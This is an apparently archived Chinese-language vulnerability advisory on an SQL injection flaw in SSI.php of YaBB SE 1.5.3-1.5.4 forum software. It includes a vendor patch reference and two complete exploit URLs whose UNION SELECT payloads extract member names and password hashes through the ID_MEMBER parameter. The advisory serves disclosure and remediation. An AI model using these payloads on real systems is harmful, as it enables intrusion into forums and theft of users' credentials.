添加时间:
2005-08-16

系统编号:
WAVDB-00361
BUGTRAQ: 9449

影响版本:
YaBB SE 1.5.3-1.5.4

程序介绍:

Yabb Se是一款基于PHP/MySQL的论坛程序。

漏洞分析:

Yabb Se包含的SSI.php没有充分过滤用户提交的URI参数，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感信息或修改数据库。

SSI.php文件返回一些论坛最近论题，版面统计等一些信息，由于对ID_MEMBER参数缺少充分的过滤，攻击者可以提交恶意SQL命令，更改原有数据库逻辑，获得敏感信息或修改数据库。

漏洞利用:

http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*

或

http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*

解决方案:
厂商补丁：
YaBB
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载升级到YABB SE 1.5.5：
http://www.yabbse.org/community/index.php?thread=27122

信息来源:
<*来源：backspace （backspace_2k@terra.es）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=107454067626384&w=2
*>